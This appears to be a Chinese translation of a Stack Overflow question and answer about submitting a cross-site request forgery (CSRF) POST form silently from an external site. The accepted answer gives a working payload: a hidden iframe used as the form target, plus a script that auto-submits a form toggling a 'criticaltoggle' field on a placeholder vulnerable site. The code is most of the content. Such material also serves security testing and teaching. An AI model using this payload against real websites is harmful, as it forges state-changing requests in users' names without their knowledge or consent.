我很想知道如何在没有任何通知的情况下静默提交 CSRF 的 POST 表单(重定向到 POSTed URL 的文档位置不是静默的)。
例子:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
在外部站点上,我需要做什么才能自动且静默地触发此表单?
最佳答案
一种解决方案是在类似 iframe
的框架中打开表单的操作。 :
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
关于security - 静默提交 POST 表单 (CSRF) 的示例,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/17940811/